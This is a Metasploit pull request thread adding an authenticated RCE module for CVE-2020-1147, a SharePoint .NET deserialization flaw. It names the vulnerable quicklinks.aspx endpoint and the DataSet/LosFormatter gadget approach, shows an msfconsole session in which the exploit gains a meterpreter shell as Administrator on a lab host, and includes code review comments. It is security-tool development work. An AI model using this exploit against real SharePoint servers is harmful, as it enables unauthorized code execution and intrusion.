Add the exploit for CVE-2020-1147
rapid7/metasploit-framework pull request #13920
Opened 2020-07-29 16:13 UTC by zeroSteiner

This PR adds an authenticated RCE exploit targeting SharePoint instances. The vulnerability details and exploit are heavily based off of the analysis posted by Steven Seeley on [srcincite.io](https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html). The vulnerability is a deserialization vulnerability within a specific type handler that can be exploited by a specially crafted HTTP request using the `DataSet` XML gadget to load a `LosFormatter` blob (hooray for more .NET Deserialization usage! :tada:).

This exploit targets the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be functioning by Soroush Dalili. While another endpoint was also confirmed to be vulnerable, and an attacker with the necessary privileges could even utilize the `PUT` verb to make a vulnerable page, I opted to hard code this into the module for the following reasons:

* This endpoint was present in the default configuration and exploitable by a "Domain User" account with no additional privilegs
* The static URI allows a more explicit check method to be utilized
* Using an existing endpoint eliminates the need to create and thus cleanup content as part of the exploitation process

## Testing

- [ ] Install the application and ensure a page is accessible
- [ ] Start msfconsole
- [ ] Do: `use exploit/windows/http/sharepoint_data_deserialization`
- [ ] Set the `RHOST`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
- [ ] Run the exploit
- [ ] You should get a shell

## Demonstration

```
msf5 > use exploit/windows/http/sharepoint_data_deserialization 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
RHOSTS => 192.168.63.168
msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
RPORT => 80
msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
VHOST => ec2amaz-v2pri0v
msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
USERNAME => smcintyre
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
PASSWORD => Password1
msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
DOMAIN => SHRPNT
msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/http/sharepoint_data_deserialization) > check
[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Received the quicklinks HTML form.
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Command Stager progress - 100.00% done (101079/101079 bytes)
[*] Started bind TCP handler against 192.168.63.168:4444
[*] Sending stage (176195 bytes) to 192.168.63.168
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400
meterpreter > sysinfo
Computer        : EC2AMAZ-V2PRI0V
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 19
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SHRPNT\Administrator
meterpreter >
```

2020-07-29 19:20 UTC, gwillcox-r7 requested changes
Overall looking good, but there are a few areas of concern and some light changes that need to be made.

2020-07-29 19:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
> +1. You should get a shell
You should really explain which user you should get a shell as here. You mention previously its running within the context of the SharePoint application service but don't explain which user this corresponds to. Would be good to add that in at the top of this documentation as well as to the end of this line.

2020-07-29 19:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
> +1. Run the exploit
Should add some steps that are marked as `Optional:` which explain setting the `VHOST` and `SSL` options, as well as `DOMAIN`. This is important given you supply them in your example below.

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated
This sentence feels too generic to me as a starter line. When I read this I want to know what page is affected and when it was patched, but this sentence doesn't really provide any info on this.

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          attacker to execute code within the context of the SharePoint application service. The vulnerability is
Same point as above, which user does this service run as?

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation.
Which component of SharePoint is responsible for this failure?

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +        'DisclosureDate' => '2020-03-02', # TODO: update me
Does this need to be updated? There is a note here that this still needs to be updated. If this is the case can we get this updated and the comment removed?

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          'Stability' => [CRASH_SAFE,],
We shouldn't have an extra comment on this line inside the `[ ]` as there is only one entry. Unless you intended to add something else here?

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
Should this not have a default value like the `USERNAME` line above it does, even if it is blank?

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +    return CheckCode::Safe unless res&.code == 200
Well technically the authentication could fail here, so probably best to account for this first before returning `CheckCode::Safe`. Also its possible the request could have timed out so I'm not sure this takes that into account either.

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +    return CheckCode::Safe unless res.headers['MicrosoftSharePointTeamServices']
Would it not be better to combine this line and the above one into one line? Seems inefficient to be doing this on two lines.

2020-07-29 19:20 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +    return CheckCode::Safe if html.xpath('//html/body/form[@action]').select do |node|
are there meant to be two `/`'s within the html.xpath parameter here?

2020-07-29 19:27 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
> +    1. Create a Domain User account for testing
No, that's a feature of markdown and when the list is rendered into HTML using `info -d` the numbers are incremented automatically.

2020-07-29 19:28 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
> +to execute code within the context of the SharePoint application service. The vulnerability is related to a failure to
It's inconsistent, it depends on what account the application was configured to run as. In my testing environment I used a Domain Admin because YOLO but I hope that's not the case in production.

2020-07-29 19:33 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +    return CheckCode::Safe if html.xpath('//html/body/form[@action]').select do |node|
Yes, that's required for the XPath specification.

2020-07-29 20:37 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated
After further review this change isn't needed as new edits explain that this is a deserialization issue within the module description. Its just on the second line rather than the first.

2020-07-29 20:39 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_data_deserialization.rb
> +          related to a failure to validate the source of XML input data, leading to an unsafe deserialization operation.
Fixed with last commit.

2020-07-29 20:40 UTC, gwillcox-r7 commented
Doing a quick review of this as new changes look good, but want to make sure the `check` method now works as expected. Otherwise looks good to merge!

2020-07-29 21:10 UTC, gwillcox-r7 approved these changes

2020-07-29 21:11 UTC, merged

2020-07-29 21:23 UTC, gwillcox-r7 commented
# Release Notes
This module adds support for CVE-2020-1147, a XML deserialization RCE within SharePoint that occurs due to a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered from a page that initializes either the `ContactLinksSuggestionsMicroView` type or a derivative of it. Successful exploitation results in remote code execution as the user running the SharePoint service. This user account will be the same user that was specified when SharePoint was installed and configured.

2020-08-06 00:07 UTC, pbarry-r7 commented
# Release Notes

New module <code>exploits/windows/http/sharepoint_data_deserialization</code> achieves RCE on versions of SharePoint containing an XML deserialization vulnerability (<a href="https://attackerkb.com/topics/HgtakVczYd/cve-2020-1147?referrer=msfReleaseNotes">CVE-2020-1147</a>)